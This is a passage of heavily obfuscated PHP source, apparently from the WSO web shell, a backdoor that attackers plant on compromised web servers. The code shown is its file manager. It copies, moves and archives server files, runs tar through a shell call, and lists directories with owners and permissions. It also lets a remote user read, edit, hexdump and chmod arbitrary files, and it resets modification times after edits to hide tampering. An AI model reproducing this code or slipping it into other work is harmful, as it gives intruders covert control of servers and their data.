@opendir($c . $s); goto XF_lF; XF_lF: while (($f = @readdir($h)) !== false) { if ($f != "\56" and $f != "\x2e\x2e") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } goto v_Vn9; DXZu5: mkdir($d . $s); goto OpM7_; v_Vn9: } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\x66"] as $f) { copy_paste($_COOKIE["\x63"], $f, $GLOBALS["\x63\x77\144"]); } } elseif ($_COOKIE["\x61\143\x74"] == "\155\157\166\145") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { goto qKJrU; TXDEI: while (($f = @readdir($h)) !== false) { if ($f != "\x2e" and $f != "\56\x2e") { copy_paste($c . $s . "\57", $f, $d . $s . "\57"); } } goto xPGvS; AwOVO: $h = @opendir($c . $s); goto TXDEI; qKJrU: mkdir($d . $s); goto AwOVO; xPGvS: } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_COOKIE["\146"] as $f) { @rename($_COOKIE["\x63"] . $f, $GLOBALS["\143\167\x64"] . $f); } } elseif ($_COOKIE["\141\x63\x74"] == "\x7a\151\160") { if (class_exists("\132\151\160\x41\162\143\150\151\x76\145")) { $zip = new ZipArchive(); if ($zip->open($_POST["\160\x32"], 1)) { goto Jun5P; Jun5P: chdir($_COOKIE["\x63"]); goto T_RpN; MVV2r: $zip->close(); goto CqwAG; T_RpN: foreach ($_COOKIE["\x66"] as $f) { if ($f == "\x2e\x2e") { continue; } if (@is_file($_COOKIE["\143"] . $f)) { $zip->addFile($_COOKIE["\x63"] . $f, $f); } elseif (@is_dir($_COOKIE["\x63"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "\57")); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } goto JhWjt; JhWjt: chdir($GLOBALS["\x63\167\x64"]); goto MVV2r; CqwAG: } } } elseif ($_COOKIE["\141\x63\164"] == "\x75\156\x7a\x69\x70") { if (class_exists("\x5a\x69\x70\101\162\143\x68\151\166\x65")) { $zip = new ZipArchive(); foreach ($_COOKIE["\x66"] as $f) { if ($zip->open($_COOKIE["\x63"] . $f)) { $zip->extractTo($GLOBALS["\x63\167\x64"]); $zip->close(); } } } } elseif ($_COOKIE["\141\143\x74"] == "\164\x61\162") { goto nrwbR; QmWa1: chdir($GLOBALS["\143\x77\144"]); goto bK26y; zHKjB: wsoEx("\x74\x61\x72\x20\x63\x66\x7a\166\x20" . escapeshellarg($_POST["\160\x32"]) . "\40" . implode("\x20", $_COOKIE["\x66"])); goto QmWa1; BU3zr: $_COOKIE["\x66"] = array_map("\x65\163\x63\141\x70\145\163\x68\x65\154\x6c\141\x72\x67", $_COOKIE["\146"]); goto zHKjB; nrwbR: chdir($_COOKIE["\x63"]); goto BU3zr; bK26y: } goto tJ8ED; HwZnR: setcookie("\146", '', time() - 3600); goto TZk2t; TZk2t: break; goto yoTwQ; tJ8ED: unset($_COOKIE["\146"]); goto HwZnR; yoTwQ: default: if (!empty($_POST["\x70\61"])) { goto TYMaj; XHEG8: WSOsetcookie("\x63", @$_POST["\x63"]); goto Unr9o; TYMaj: WSOsetcookie("\141\143\164", $_POST["\x70\x31"]); goto XUMLY; XUMLY: WSOsetcookie("\x66", serialize(@$_POST["\x66"])); goto XHEG8; Unr9o: } break; } } goto bpziK; JbUVa: usort($files, "\x77\x73\x6f\x43\155\x70"); goto pBUl1; RjKbq: function wsoCmp($a, $b) { if ($GLOBALS["\x73\157\162\x74"][0] != "\163\151\172\145") { return strcmp(strtolower($a[$GLOBALS["\x73\x6f\x72\x74"][0]]), strtolower($b[$GLOBALS["\163\x6f\162\x74"][0]])) * ($GLOBALS["\x73\x6f\162\x74"][1] ? 1 : -1); } else { return ($a["\163\x69\x7a\145"] < $b["\163\x69\x7a\x65"] ? -1 : 1) * ($GLOBALS["\163\157\x72\x74"][1] ? 1 : -1); } } goto JbUVa; flVXx: $GLOBALS["\x73\157\162\164"] = $sort; goto RjKbq; b42P7: echo "\74\x2f\x73\x65\154\145\143\x74\x3e\46\x6e\142\x73\160\73"; goto zga6H; QsnjB: $dirContent = wsoScandir(isset($_POST["\x63"]) ? $_POST["\143"] : $GLOBALS["\x63\x77\144"]); goto DufhY; EoM5y: if (!empty($_POST["\160\61"])) { if (preg_match("\x21\163\x5f\50\x5b\101\x2d\x7a\x5d\x2b\51\137\50\134\x64\173\61\175\51\x21", $_POST["\x70\x31"], $match)) { $sort = array($match[1], (int) $match[2]); } } goto uaEIV; ecDrl: echo "\x3c\150\x31\x3e\106\x69\x6c\x65\40\x6d\141\156\x61\x67\x65\x72\x3c\x2f\150\61\76\x3c\x64\x69\x76\40\x63\x6c\x61\163\x73\x3d\x63\157\x6e\164\145\156\x74\76\74\163\x63\x72\x69\x70\x74\x3e\160\x31\137\x3d\x70\x32\137\x3d\160\63\x5f\75\42\42\73\x3c\x2f\x73\143\162\151\160\x74\76"; goto QsnjB; J7jRR: if (!empty($_COOKIE["\146"])) { $_COOKIE["\x66"] = @unserialize($_COOKIE["\146"]); } goto uO4Od; zqQv8: foreach ($files as $f) { echo "\74\x74\162" . ($l ? "\x20\x63\154\x61\163\x73\75\154\61" : '') . "\76\74\x74\144\76\74\151\x6e\160\x75\x74\40\x74\171\160\145\x3d\143\150\145\x63\153\x62\x6f\170\40\x6e\x61\155\145\75\42\146\133\135\42\x20\166\141\154\165\145\75\42" . urlencode($f["\156\x61\x6d\145"]) . "\x22\x20\143\x6c\141\163\163\75\143\150\x6b\142\x78\x3e\74\57\164\144\x3e\74\x74\x64\x3e\x3c\x61\x20\150\x72\x65\x66\x3d\43\40\x6f\x6e\x63\x6c\151\143\153\75\42" . ($f["\164\x79\160\145"] == "\146\x69\x6c\x65" ? "\x67\x28\x27\x46\151\x6c\x65\x73\124\157\x6f\154\x73\47\x2c\156\165\154\x6c\x2c\47" . urlencode($f["\156\x61\155\x65"]) . "\47\54\40\47\166\151\145\x77\x27\x29\42\76" . htmlspecialchars($f["\156\141\155\x65"]) : "\147\50\47\106\151\154\145\x73\115\141\x6e\x27\x2c\47" . $f["\160\x61\164\150"] . "\47\x29\x3b\x22\40" . (empty($f["\154\x69\x6e\153"]) ? '' : "\164\151\164\154\x65\x3d\47{$f["\154\151\x6e\153"]}\47") . "\x3e\x3c\x62\76\x5b\x20" . htmlspecialchars($f["\156\141\155\145"]) . "\40\135\x3c\57\142\76") . "\x3c\x2f\141\76\74\x2f\164\144\x3e\x3c\164\144\x3e" . ($f["\164\171\x70\x65"] == "\x66\151\x6c\x65" ? wsoViewSize($f["\x73\151\172\x65"]) : $f["\164\x79\160\x65"]) . "\x3c\x2f\164\x64\76\x3c\x74\x64\x3e" . $f["\155\x6f\x64\x69\x66\171"] . "\x3c\57\x74\x64\76\74\x74\x64\76" . $f["\x6f\x77\156\x65\162"] . "\57" . $f["\x67\162\x6f\165\160"] . "\74\x2f\164\x64\76\x3c\x74\x64\76\74\141\x20\150\162\x65\x66\x3d\43\x20\157\156\143\x6c\x69\x63\x6b\75\x22\x67\x28\47\106\151\x6c\x65\163\x54\x6f\157\154\163\47\x2c\156\165\154\x6c\x2c\47" . urlencode($f["\x6e\141\155\145"]) . "\47\54\47\x63\x68\155\157\x64\47\x29\x22\x3e" . $f["\x70\145\x72\155\x73"] . "\x3c\57\164\x64\x3e\x3c\164\x64\76\74\141\40\x68\162\x65\x66\x3d\x22\x23\x22\x20\x6f\156\143\154\151\x63\153\x3d\x22\x67\50\x27\x46\x69\154\145\x73\x54\157\x6f\x6c\163\47\x2c\156\x75\x6c\154\54\x27" . urlencode($f["\x6e\x61\x6d\x65"]) . "\x27\x2c\x20\x27\x72\145\156\x61\155\145\x27\51\x22\x3e\122\x3c\57\x61\x3e\x20\x3c\141\x20\150\162\145\146\75\x22\43\x22\x20\x6f\156\143\x6c\151\143\153\75\42\x67\x28\47\x46\151\154\145\x73\x54\157\157\x6c\x73\x27\x2c\156\165\154\x6c\x2c\47" . urlencode($f["\x6e\141\155\x65"]) . "\47\x2c\x20\47\164\x6f\165\143\150\47\51\42\x3e\124\x3c\57\x61\76" . ($f["\x74\x79\x70\x65"] == "\146\151\154\x65" ? "\x20\74\141\40\x68\x72\145\146\75\42\43\42\40\x6f\x6e\143\x6c\x69\x63\153\x3d\42\x67\50\47\106\151\x6c\145\x73\124\157\157\154\x73\x27\54\x6e\165\154\154\54\47" . urlencode($f["\x6e\141\155\x65"]) . "\x27\x2c\40\x27\145\144\151\164\x27\x29\x22\x3e\x45\x3c\57\141\76\x20\74\141\x20\150\162\145\x66\75\42\x23\x22\40\157\156\x63\x6c\x69\x63\x6b\x3d\42\x67\x28\x27\x46\151\154\145\163\x54\x6f\157\154\x73\47\54\156\x75\x6c\x6c\54\x27" . urlencode($f["\x6e\x61\155\x65"]) . "\x27\54\40\47\144\x6f\x77\x6e\154\x6f\141\144\x27\51\x22\76\104\x3c\57\141\76" : '') . "\74\x2f\164\x64\x3e\x3c\x2f\x74\x72\x3e"; $l = $l ? 0 : 1; } goto b9q_L; ICFmG: $l = 0; goto zqQv8; TSLht: $n = count($dirContent); goto p625P; lC5LC: $dirs = $files = array(); goto TSLht; uaEIV: echo "\74\163\143\x72\151\160\x74\x3e\xd\12\11\x66\x75\x6e\x63\x74\x69\157\156\40\x73\x61\x28\51\40\173\15\12\11\11\x66\x6f\162\50\x69\x3d\60\x3b\151\x3c\x64\56\146\151\154\145\163\56\x65\x6c\x65\155\145\x6e\x74\x73\56\154\x65\156\147\164\150\73\x69\53\x2b\51\15\12\x9\11\11\151\x66\x28\x64\56\146\151\x6c\x65\163\x2e\x65\154\145\155\145\x6e\164\163\x5b\151\x5d\56\164\171\x70\x65\x20\75\x3d\40\47\x63\x68\145\143\153\142\157\x78\47\51\xd\xa\11\x9\11\11\144\56\146\151\154\145\163\x2e\145\154\x65\x6d\x65\x6e\164\163\x5b\151\x5d\x2e\143\x68\145\143\153\x65\x64\40\x3d\x20\144\x2e\x66\151\154\x65\x73\x2e\x65\154\145\155\x65\x6e\x74\163\133\x30\135\56\143\x68\x65\x63\x6b\x65\x64\x3b\xd\xa\11\x7d\xd\xa\74\57\163\x63\162\151\x70\164\76\15\12\x3c\164\x61\142\x6c\145\x20\167\151\x64\x74\x68\x3d\47\x31\60\60\45\47\x20\x63\154\141\x73\163\75\x27\155\x61\x69\156\x27\x20\143\x65\x6c\154\163\160\x61\143\151\156\x67\75\47\x30\47\40\x63\145\154\x6c\160\x61\144\144\151\x6e\x67\x3d\x27\x32\47\x3e\xd\12\x3c\146\157\162\x6d\x20\156\141\x6d\x65\x3d\146\151\x6c\145\x73\x20\155\145\x74\150\157\x64\75\160\157\163\x74\x3e\74\164\x72\76\x3c\x74\150\x20\x77\x69\144\x74\x68\75\x27\x31\x33\x70\170\47\x3e\x3c\x69\156\160\165\164\x20\x74\x79\x70\x65\75\143\x68\x65\x63\x6b\x62\x6f\x78\x20\157\156\143\x6c\151\x63\x6b\x3d\x27\x73\141\x28\x29\x27\40\x63\154\141\x73\x73\75\x63\150\x6b\142\170\76\74\x2f\x74\x68\x3e\x3c\164\150\76\x3c\x61\x20\150\x72\145\146\75\x27\43\47\40\x6f\x6e\x63\x6c\x69\143\153\x3d\47\147\x28\x22\106\151\x6c\x65\163\x4d\x61\156\42\x2c\x6e\x75\x6c\154\54\x22\x73\137\x6e\141\155\145\x5f" . ($sort[1] ? 0 : 1) . "\x22\x29\47\x3e\x4e\141\155\145\x3c\x2f\141\76\74\57\164\x68\x3e\x3c\x74\150\76\x3c\141\40\150\x72\x65\x66\x3d\x27\x23\47\40\157\156\143\154\151\143\153\x3d\47\x67\x28\x22\106\151\x6c\x65\x73\115\141\156\x22\54\156\165\x6c\154\54\x22\163\137\x73\151\172\145\x5f" . ($sort[1] ? 0 : 1) . "\x22\x29\47\76\x53\151\x7a\x65\74\57\x61\76\x3c\x2f\x74\150\76\74\x74\150\76\x3c\141\x20\150\162\145\146\75\47\x23\x27\x20\157\x6e\143\x6c\x69\x63\153\75\x27\x67\50\42\x46\x69\154\145\x73\115\141\x6e\42\x2c\x6e\165\154\x6c\x2c\x22\x73\x5f\x6d\157\x64\x69\x66\171\137" . ($sort[1] ? 0 : 1) . "\42\x29\47\x3e\115\157\x64\151\146\x79\74\x2f\141\x3e\74\x2f\164\150\76\74\x74\x68\76\x4f\167\x6e\145\x72\x2f\x47\162\157\x75\x70\74\x2f\164\x68\76\74\164\x68\76\74\x61\x20\x68\162\x65\146\75\x27\x23\47\40\x6f\156\143\x6c\x69\143\x6b\x3d\x27\147\50\42\106\151\154\145\163\x4d\141\x6e\x22\54\156\x75\154\154\x2c\x22\x73\x5f\160\145\x72\x6d\163\x5f" . ($sort[1] ? 0 : 1) . "\x22\51\47\x3e\x50\145\162\x6d\x69\163\x73\x69\x6f\x6e\163\x3c\57\141\x3e\74\57\164\150\76\74\x74\150\x3e\101\143\x74\151\x6f\156\x73\74\x2f\164\x68\76\74\x2f\164\162\x3e"; goto lC5LC; b9q_L: echo "\x3c\x74\162\x3e\x3c\164\x64\40\143\x6f\154\x73\160\141\156\75\x37\76\xd\xa\11\x3c\x69\156\160\165\164\40\164\171\x70\145\75\150\x69\x64\x64\145\x6e\x20\156\x61\155\145\x3d\141\40\x76\141\154\x75\x65\75\47\106\151\x6c\145\x73\x4d\x61\x6e\x27\76\xd\xa\x9\x3c\151\156\160\x75\x74\x20\164\171\160\x65\x3d\150\151\144\144\145\x6e\x20\156\x61\155\145\x3d\x63\40\166\141\x6c\165\145\x3d\x27" . htmlspecialchars($GLOBALS["\143\x77\x64"]) . "\47\x3e\15\xa\11\74\151\156\160\x75\x74\x20\164\x79\x70\x65\x3d\150\151\144\x64\145\x6e\40\156\x61\x6d\x65\75\143\x68\141\x72\163\x65\x74\40\x76\x61\154\x75\x65\x3d\47" . (isset($_POST["\143\x68\141\162\163\145\164"]) ? $_POST["\x63\150\x61\162\x73\145\164"] : '') . "\x27\76\xd\xa\11\x3c\163\145\x6c\x65\x63\164\x20\x6e\141\155\x65\75\x27\160\x31\x27\76\x3c\157\160\x74\x69\x6f\x6e\x20\166\x61\154\x75\145\x3d\x27\x63\157\x70\171\47\x3e\x43\x6f\160\171\74\x2f\x6f\160\x74\x69\x6f\x6e\x3e\x3c\157\x70\x74\x69\157\156\x20\166\141\x6c\165\145\75\x27\155\157\166\x65\47\x3e\x4d\157\x76\x65\x3c\x2f\157\x70\x74\x69\157\x6e\x3e\x3c\157\160\x74\151\x6f\x6e\40\166\x61\x6c\165\145\75\47\x64\145\154\145\x74\145\x27\76\104\x65\154\x65\x74\145\x3c\x2f\x6f\x70\164\151\157\156\x3e"; goto la8rp; MMpaa: $sort = array("\x6e\141\x6d\x65", 1); goto EoM5y; bpziK: wsoHeader(); goto ecDrl; GTtN3: echo "\74\157\x70\x74\x69\x6f\x6e\40\x76\x61\154\x75\145\75\47\x74\x61\x72\47\76\103\157\155\160\162\145\x73\163\40\x28\x74\141\162\x2e\147\172\x29\x3c\x2f\157\160\x74\151\157\x6e\x3e"; goto qCBL1; zga6H: if (!empty($_COOKIE["\x61\143\x74"]) && @count($_COOKIE["\x66"]) && ($_COOKIE["\x61\143\x74"] == "\x7a\151\x70" || $_COOKIE["\141\x63\164"] == "\164\141\x72")) { echo "\x66\x69\154\145\40\156\x61\155\145\x3a\40\x3c\x69\x6e\x70\x75\164\40\164\x79\x70\145\x3d\164\145\x78\x74\40\156\141\x6d\145\x3d\x70\x32\40\166\141\x6c\165\x65\75\x27\x77\x73\157\137" . date("\131\155\144\137\x48\151\x73") . "\56" . ($_COOKIE["\141\x63\x74"] == "\x7a\x69\160" ? "\172\151\160" : "\164\141\162\56\147\x7a") . "\47\x3e\46\x6e\x62\x73\x70\x3b"; } goto T3WX2; DufhY: if ($dirContent === false) { goto KJVLY; PFKsl: wsoFooter(); goto ZsRi7; KJVLY: echo "\x43\141\156\47\164\x20\157\160\x65\156\x20\x74\x68\x69\163\x20\146\157\x6c\x64\x65\x72\x21"; goto PFKsl; ZsRi7: return; goto Uwcm2; Uwcm2: } goto S7vm3; T3WX2: echo "\x3c\151\156\x70\x75\164\40\x74\171\160\145\x3d\x27\163\165\142\x6d\151\164\47\x20\166\141\x6c\165\145\75\x27\76\76\x27\x3e\74\57\164\144\x3e\x3c\57\x74\x72\x3e\x3c\57\146\x6f\162\155\76\x3c\57\164\141\142\x6c\145\76\74\x2f\x64\x69\x76\76"; goto LlrBb; LlrBb: wsoFooter(); goto JxN5l; S7vm3: global $sort; goto MMpaa; pBUl1: usort($dirs, "\x77\163\x6f\103\155\x70"); goto zukJ7; p625P: for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("\x6e\141\x6d\x65" => $dirContent[$i], "\x70\141\x74\150" => $GLOBALS["\143\167\144"] . $dirContent[$i], "\x6d\x6f\144\151\146\171" => date("\131\55\x6d\55\144\40\110\x3a\151\72\163", @filemtime($GLOBALS["\x63\167\x64"] . $dirContent[$i])), "\x70\145\162\x6d\163" => wsoPermsColor($GLOBALS["\143\x77\x64"] . $dirContent[$i]), "\x73\x69\172\x65" => @filesize($GLOBALS["\x63\x77\x64"] . $dirContent[$i]), "\x6f\167\156\x65\162" => $ow["\x6e\x61\155\x65"] ? $ow["\x6e\x61\x6d\x65"] : @fileowner($dirContent[$i]), "\x67\x72\157\165\160" => $gr["\x6e\x61\155\x65"] ? $gr["\x6e\141\155\x65"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["\x63\x77\144"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("\164\171\160\145" => "\146\151\x6c\x65")); } elseif (@is_link($GLOBALS["\x63\167\x64"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("\164\x79\160\145" => "\154\x69\156\x6b", "\154\x69\156\153" => readlink($tmp["\160\141\x74\x68"]))); } elseif (@is_dir($GLOBALS["\x63\167\144"] . $dirContent[$i]) && $dirContent[$i] != "\56") { $dirs[] = array_merge($tmp, array("\164\171\x70\145" => "\144\x69\162")); } } goto flVXx; qCBL1: if (!empty($_COOKIE["\x61\143\164"]) && @count($_COOKIE["\146"])) { echo "\74\157\160\x74\151\157\156\40\166\x61\154\165\x65\x3d\x27\x70\141\163\x74\x65\47\76\x50\141\163\x74\x65\x20\x2f\40\103\x6f\x6d\160\162\145\x73\x73\x3c\x2f\157\x70\x74\x69\x6f\x6e\76"; } goto b42P7; zukJ7: $files = array_merge($dirs, $files); goto ICFmG; JxN5l: } goto KC9ar; xB4MH: function actionFilesTools() { goto BkWtk; URhzm: if (is_file($_POST["\160\61"])) { $m = array("\x56\x69\x65\167", "\110\151\147\x68\x6c\151\147\150\164", "\104\x6f\167\156\x6c\x6f\x61\x64", "\110\145\170\144\165\x6d\x70", "\105\144\151\164", "\x43\150\x6d\157\x64", "\x52\145\x6e\x61\x6d\x65", "\x54\157\x75\143\150"); } else { $m = array("\103\x68\x6d\x6f\x64", "\122\x65\x6e\x61\x6d\145", "\124\x6f\x75\143\x68"); } goto ehyTX; gIv2Z: echo "\x3c\57\144\151\166\76"; goto q1Rl0; ehyTX: foreach ($m as $v) { echo "\74\141\x20\150\162\145\x66\x3d\x23\x20\157\156\143\x6c\x69\x63\x6b\x3d\42\147\50\x6e\x75\x6c\154\54\156\x75\x6c\x6c\x2c\x27" . urlencode($_POST["\160\x31"]) . "\47\x2c\x27" . strtolower($v) . "\47\x29\x22\x3e" . (strtolower($v) == @$_POST["\160\62"] ? "\x3c\x62\76\x5b\x20" . $v . "\40\x5d\x3c\x2f\142\76" : $v) . "\74\57\x61\76\x20"; } goto OeBNf; FcH_v: if (!$uid) { $uid["\x6e\x61\155\x65"] = @fileowner($_POST["\x70\x31"]); $gid["\156\x61\155\145"] = @filegroup($_POST["\160\x31"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["\160\61"])); } goto XQqyZ; tJhrh: if (@$_POST["\x70\x32"] == "\x6d\x6b\146\151\x6c\145") { if (!file_exists($_POST["\x70\61"])) { $fp = @fopen($_POST["\x70\61"], "\167"); if ($fp) { $_POST["\x70\x32"] = "\145\144\x69\164"; fclose($fp); } } } goto UpcWr; hJxBN: echo "\74\x68\x31\x3e\x46\151\x6c\145\x20\x74\x6f\x6f\154\x73\x3c\57\150\x31\x3e\x3c\144\x69\x76\40\143\154\x61\163\x73\x3d\x63\157\x6e\164\x65\156\x74\76"; goto LggyK; jReNS: if (empty($_POST["\x70\x32"])) { $_POST["\x70\62"] = "\x76\x69\x65\167"; } goto URhzm; OeBNf: echo "\x3c\x62\162\76\x3c\x62\162\x3e"; goto kfx86; vLiGd: echo "\x3c\163\x70\141\x6e\76\103\x72\x65\141\x74\x65\x20\164\x69\155\x65\x3a\74\57\163\160\x61\156\x3e\40" . date("\x59\x2d\155\55\x64\40\x48\72\x69\x3a\x73", filectime($_POST["\160\x31"])) . "\x20\74\x73\x70\141\x6e\x3e\101\143\x63\x65\x73\163\40\164\x69\155\x65\72\x3c\x2f\x73\x70\x61\156\76\40" . date("\131\55\x6d\x2d\144\40\x48\72\151\x3a\163", fileatime($_POST["\160\61"])) . "\40\74\163\160\x61\x6e\76\x4d\157\144\x69\146\171\x20\164\151\155\x65\72\x3c\57\163\160\x61\x6e\76\x20" . date("\x59\x2d\x6d\x2d\144\40\110\72\x69\x3a\x73", filemtime($_POST["\160\61"])) . "\74\x62\x72\x3e\74\142\162\x3e"; goto jReNS; LggyK: if (!file_exists(@$_POST["\x70\61"])) { goto uyJNU; C_fb1: return; goto fRIHs; uyJNU: echo "\106\x69\x6c\145\40\156\157\x74\40\145\170\x69\x73\x74\163"; goto aEu8k; aEu8k: wsoFooter(); goto C_fb1; fRIHs: } goto RVSqZ; BkWtk: if (isset($_POST["\x70\x31"])) { $_POST["\160\x31"] = urldecode($_POST["\x70\61"]); } goto nB0r7; UpcWr: wsoHeader(); goto hJxBN; q1Rl0: wsoFooter(); goto lZIie; RVSqZ: $uid = @posix_getpwuid(@fileowner($_POST["\x70\61"])); goto FcH_v; kfx86: switch ($_POST["\160\62"]) { case "\166\151\145\x77": goto QAifq; bn9Hw: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto bbBoN; bbBoN: echo "\74\57\x70\x72\145\x3e"; goto K9Wsy; GqRN7: $fp = @fopen($_POST["\x70\61"], "\x72"); goto bn9Hw; K9Wsy: break; goto xBp1j; QAifq: echo "\74\160\162\145\40\143\x6c\x61\x73\x73\x3d\x6d\x6c\61\76"; goto GqRN7; xBp1j: case "\150\x69\147\x68\x6c\x69\147\x68\x74": if (@is_readable($_POST["\160\x31"])) { goto QC8Iq; XU2TQ: $code = @highlight_file($_POST["\160\61"], true); goto MtAXT; QC8Iq: echo "\74\x64\151\x76\40\143\154\x61\x73\x73\75\155\x6c\61\x20\163\x74\x79\154\x65\x3d\42\142\x61\143\x6b\147\162\x6f\x75\156\144\x2d\x63\157\x6c\157\x72\72\40\x23\x65\x31\145\x31\x65\61\x3b\143\157\154\x6f\x72\72\x62\x6c\x61\x63\153\73\42\76"; goto XU2TQ; MtAXT: echo str_replace(array("\74\163\160\x61\x6e\x20", "\74\57\163\x70\141\156\76"), array("\x3c\x66\x6f\156\x74\x20", "\x3c\x2f\146\x6f\x6e\x74\x3e"), $code) . "\x3c\57\x64\x69\166\x3e"; goto nntLP; nntLP: } break; case "\x63\150\x6d\157\x64": goto P8hG1; LoNwV: break; goto AyuC5; lmil1: echo "\74\163\x63\x72\151\160\x74\x3e\x70\x33\137\75\x22\42\x3b\x3c\x2f\x73\x63\162\151\160\x74\76\74\146\157\162\x6d\40\157\x6e\163\165\142\x6d\x69\164\x3d\x22\x67\50\156\x75\154\154\54\x6e\165\154\154\54\47" . urlencode($_POST["\160\61"]) . "\x27\x2c\x6e\165\x6c\x6c\54\x74\150\151\163\56\143\x68\155\157\x64\56\166\x61\x6c\165\x65\51\x3b\162\145\164\x75\162\x6e\x20\x66\x61\154\163\x65\x3b\x22\76\74\x69\156\x70\165\x74\40\164\171\160\145\x3d\164\145\170\x74\40\x6e\141\x6d\145\75\143\150\155\157\x64\40\x76\x61\x6c\165\145\75\42" . substr(sprintf("\x25\x6f", fileperms($_POST["\160\61"])), -4) . "\x22\76\x3c\151\156\x70\x75\x74\40\x74\171\160\145\x3d\x73\165\142\x6d\x69\164\40\x76\x61\154\165\145\75\x22\x3e\76\42\x3e\x3c\57\146\x6f\x72\155\76"; goto LoNwV; AAUh2: clearstatcache(); goto lmil1; P8hG1: if (!empty($_POST["\x70\63"])) { goto dVl9Y; brcvZ: for ($i = strlen($_POST["\160\63"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["\x70\x33"][$i] * pow(8, strlen($_POST["\x70\63"]) - $i - 1); } goto NKCFJ; NKCFJ: if (!@chmod($_POST["\160\61"], $perms)) { echo "\103\x61\156\47\x74\40\163\x65\x74\40\x70\x65\162\x6d\151\x73\163\x69\x6f\x6e\163\41\x3c\142\x72\76\74\x73\x63\x72\x69\160\x74\x3e\x64\157\143\x75\155\145\x6e\x74\56\x6d\146\x2e\x70\x33\56\x76\x61\154\165\145\x3d\42\42\73\x3c\x2f\163\x63\162\x69\160\x74\76"; } goto PY3E2; dVl9Y: $perms = 0; goto brcvZ; PY3E2: } goto AAUh2; AyuC5: case "\145\144\x69\164": goto H2fMN; jCDwf: echo "\74\x2f\164\x65\170\164\x61\x72\145\141\76\74\151\x6e\160\x75\164\x20\164\171\x70\145\x3d\163\x75\x62\x6d\151\x74\40\x76\x61\154\x75\145\75\42\x3e\76\x22\76\x3c\57\146\x6f\x72\155\76"; goto Pjp_6; l2f3k: echo "\74\x66\x6f\x72\x6d\40\157\x6e\x73\x75\x62\x6d\x69\x74\x3d\x22\147\50\156\165\x6c\x6c\54\156\x75\154\x6c\x2c\47" . urlencode($_POST["\160\61"]) . "\x27\x2c\156\x75\x6c\154\x2c\x27\61\47\53\x74\x68\x69\x73\56\164\145\x78\164\56\x76\141\154\165\145\51\x3b\x72\145\x74\x75\162\x6e\x20\146\141\154\x73\x65\73\42\x3e\74\164\x65\170\164\x61\162\145\x61\x20\x6e\x61\x6d\145\x3d\x74\x65\x78\164\x20\x63\154\141\163\x73\x3d\x62\x69\x67\x61\162\145\141\76"; goto B2Klk; YessQ: if (!empty($_POST["\x70\63"])) { goto rcwpk; JCP0G: $fp = @fopen($_POST["\160\x31"], "\167"); goto UIGX9; UIGX9: if ($fp) { goto AyUGu; ZpECv: echo "\123\141\x76\145\144\41\x3c\x62\x72\76\x3c\x73\143\x72\x69\160\x74\x3e\x70\x33\137\x3d\42\x22\73\74\57\x73\143\x72\151\160\x74\x3e"; goto ukKwu; zJt34: @fclose($fp); goto ZpECv; AyUGu: @fwrite($fp, $_POST["\160\x33"]); goto zJt34; ukKwu: @touch($_POST["\x70\61"], $time, $time); goto w_o1Q; w_o1Q: } goto ccEmf; yLb3a: $_POST["\x70\x33"] = substr($_POST["\x70\63"], 1); goto JCP0G; rcwpk: $time = @filemtime($_POST["\x70\61"]); goto yLb3a; ccEmf: } goto l2f3k; H2fMN: if (!is_writable($_POST["\160\x31"])) { echo "\106\151\154\x65\x20\151\163\156\x27\x74\x20\167\x72\x69\164\x65\x61\142\154\145"; break; } goto YessQ; B2Klk: $fp = @fopen($_POST["\160\61"], "\162"); goto of9BR; of9BR: if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } goto jCDwf; Pjp_6: break; goto Gznea; Gznea: case "\x68\145\170\144\165\x6d\160": goto m3kPv; AuUGX: $h = array("\x30\60\60\x30\60\60\x30\60\x3c\142\x72\x3e", '', ''); goto GyLAr; qeOJi: $n = 0; goto AuUGX; jL3k2: echo "\74\164\x61\x62\x6c\x65\x20\143\x65\x6c\x6c\x73\160\x61\x63\151\x6e\x67\75\x31\x20\143\x65\154\x6c\160\141\x64\x64\151\156\x67\75\x35\x20\142\147\143\x6f\154\x6f\x72\x3d\43\62\x32\62\x32\62\x32\76\74\x74\162\76\x3c\x74\x64\40\x62\147\x63\x6f\x6c\157\162\x3d\43\x33\63\63\63\x33\63\x3e\74\x73\160\141\156\40\x73\164\x79\x6c\x65\75\x22\x66\157\x6e\164\55\167\145\x69\147\150\164\x3a\x20\156\157\x72\155\x61\154\73\x22\x3e\x3c\160\162\x65\x3e" . $h[0] . "\74\57\x70\x72\145\x3e\74\x2f\x73\x70\141\156\76\x3c\57\x74\144\76\x3c\164\x64\x20\142\x67\x63\x6f\154\x6f\162\75\43\x32\70\62\x38\x32\70\x3e\74\160\162\x65\x3e" . $h[1] . "\x3c\57\x70\x72\x65\x3e\74\x2f\164\x64\76\x3c\x74\x64\x20\142\x67\143\157\154\157\162\75\x23\x33\x33\63\x33\63\x33\x3e\x3c\160\x72\x65\76" . htmlspecialchars($h[2]) . "\74\x2f\160\x72\145\x3e\74\x2f\164\144\x3e\x3c\x2f\164\162\x3e\x3c\x2f\x74\141\x62\154\145\x3e"; goto Ufiap; m3kPv: $c = @file_get_contents($_POST["\160\x31"]); goto qeOJi; Lem2Z: for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("\45\x30\x32\130", ord($c[$i])) . "\x20"; switch (ord($c[$i])) { case 0: $h[2] .= "\40"; break; case 9: $h[2] .= "\x20"; break; case 10: $h[2] .= "\40"; break; case 13: $h[2] .= "\40"; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { goto NPU7A; NPU7A: $n = 0; goto LQkUO; fObRZ: $h[1] .= "\74\142\x72\x3e"; goto fMXko; LQkUO: if ($i + 1 < $len) { 